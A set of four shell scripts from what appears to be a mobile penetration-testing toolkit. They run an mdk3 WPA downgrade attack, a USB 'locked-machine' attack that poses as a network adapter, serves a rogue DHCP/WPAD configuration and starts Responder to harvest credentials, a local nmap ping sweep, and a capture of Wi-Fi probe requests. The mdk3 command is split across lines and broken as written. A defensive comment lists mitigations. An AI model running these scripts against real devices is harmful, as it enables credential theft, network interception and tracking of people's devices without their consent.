/mdkdowngradetest.sh:
--------------------------------------------------------------------------------
#!/bin/bash
airmon-ng start wlan1
mdk3 
wlan1mon g
# 'g' is mdk3's WPA downgrade test mode (per mdk3's usage text), run on the
# monitor interface airmon-ng created from wlan1 above. Nothing stops the
# monitor interface afterwards.
--------------------------------------------------------------------------------
/mubix-lock.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# TODO: Add checks for packages
#
# apt-get install -y python git python-pip python-dev screen sqlite3
# pip install pycrypto
# cd /root
# git clone https://github.com/spiderlabs/responder
#
# What this does: re-enumerates the phone's USB gadget as an RNDIS Ethernet
# adapter, gives it 10.0.0.201/24, serves DHCP on it (router, DNS and WPAD URL
# all pointing back here), then starts Responder in a detached screen session.
# linklocal-mubix-lock.sh is the same script on a 169.254.0.0/16 address.
#
# Defensive note, host side: disabling WPAD/automatic proxy detection, turning
# off LLMNR and NetBIOS name resolution, requiring SMB signing, and blocking
# installation of new USB network-class devices while the session is locked
# each cut this path; a new NIC appearing with a 10.0.0.201 gateway while the
# screen is locked is the event worth alerting on.

#
# TODO: Add check for RNDIS interface
#
echo "Bringing down USB"
# We have to disable the usb interface before reconfiguring it
echo 0 > /sys/devices/virtual/android_usb/android0/enable
# Android USB gadget reconfiguration via sysfs: switch the function set to
# rndis, set bDeviceClass 224 (0xE0) and the product id, then re-enable.
echo rndis > /sys/devices/virtual/android_usb/android0/functions
echo 224 > /sys/devices/virtual/android_usb/android0/bDeviceClass
echo 6863 > /sys/devices/virtual/android_usb/android0/idProduct
echo 1 > /sys/devices/virtual/android_usb/android0/enable

echo "Check for changes"
# Check whether it has applied the changes
cat /sys/devices/virtual/android_usb/android0/functions
cat /sys/devices/virtual/android_usb/android0/enable

echo "rndis0 interface:"
ifconfig rndis0

echo "Setting IP for rndis0"
ip addr flush dev rndis0
ip addr add 10.0.0.201/24 dev rndis0
ip link set rndis0 up

# The heredoc is unquoted; it contains no "$" so nothing is expanded here.
# Two-address range (10.0.0.1-10.0.0.2): at most two leases at a time.
echo "Creating DHCP.conf"
cat << EOF > /root/mubix-dhcpd.conf

option domain-name "domain.local";
option domain-name-servers 10.0.0.201;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
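subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.1 10.0.0.2;
option routers 10.0.0.201;
option local-proxy-config "http://10.0.0.201/wpad.dat";
}
EOF

echo "Remove previous dhcpd leases"
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

echo "Starting DHCPD server"
/usr/sbin/dhcpd -cf /root/mubix-dhcpd.conf

echo "Creating SCREEN logger"
cat << EOF > /root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log
EOF
mkdir -p /root/logs

# Responder runs detached in a screen session named "responder" on rndis0;
# the options are Responder's own (see its README).
echo "Starting Responder"
/usr/bin/screen -dmS responder bash -c 'cd /root/Responder/; python Responder.py -I rndis0 -f -w -r -d -F'

# TODO: Kill Responder, bring rndis0 down
--------------------------------------------------------------------------------
/nmapme.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# - nmapme.sh - github.com/violentlydave
# ---- nmap -sP local net
#
# Usage: nmapme.sh [interface]   (defaults to wlan0)
# Reads the interface's first IPv4 address and prefix length and runs an nmap
# host-discovery sweep (no port scan) over that network.
# Exit status: 1 when the interface has no IPv4 address, else nmap's own.

INT=$1

if [[ $# -eq 0 ]] ; then
  echo ""
  echo " $0 - script to ping sweep local net."
  echo ""
  echo " usage:"
  echo " $0 wifi-interface-of-network-you-wanna-scan"
  echo ""
  echo " ... no interface given, defaulting to wlan0. /24"
  INT="wlan0"
fi

# The target comes from iproute2's CIDR field ("192.168.1.5/24" makes nmap
# sweep that /24). The previous `ifconfig | grep broadcast | sed s/255/0\/24/`
# rewrote every "255" in the broadcast address, so a broadcast such as
# 10.255.255.255, or any non-/24 network, produced an unusable target.
NETWORKTOSCAN=$(ip -4 -o addr show dev "$INT" 2>/dev/null | awk '{ print $4; exit }')
if [[ -z "$NETWORKTOSCAN" ]]; then
  echo "no IPv4 address found on $INT" >&2
  exit 1
fi

echo SCANNING "$INT"
# -sn is the current spelling of -sP (host discovery only); -n skips reverse DNS.
nmap -sn -n "$NETWORKTOSCAN"
--------------------------------------------------------------------------------
/quickprobegrab.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Capture probe requests on wlan1 into ./captures/<timestamp>.pcap until
# interrupted (tcpdump has no time limit here), then stop monitor mode.
DATE=`date +%Y%m%d-%H%M%S`
FILE="captures/$DATE.pcap"
# INT is only used in the banner; the commands below name wlan1/wlan1mon directly.
INT="wlan1"

echo -----------------------------
echo Starting up monitor on $INT
echo -----------------------------
ifconfig wlan1
airmon-ng start wlan1
echo -----------------------------
echo Capturing to $FILE ...
echo -----------------------------
echo
tcpdump -l -e -i wlan1mon -s 256 -w $FILE type mgt subtype probe-req
echo -----------------------------
echo Cleaning up...
echo -----------------------------
echo
airmon-ng stop wlan1mon
--------------------------------------------------------------------------------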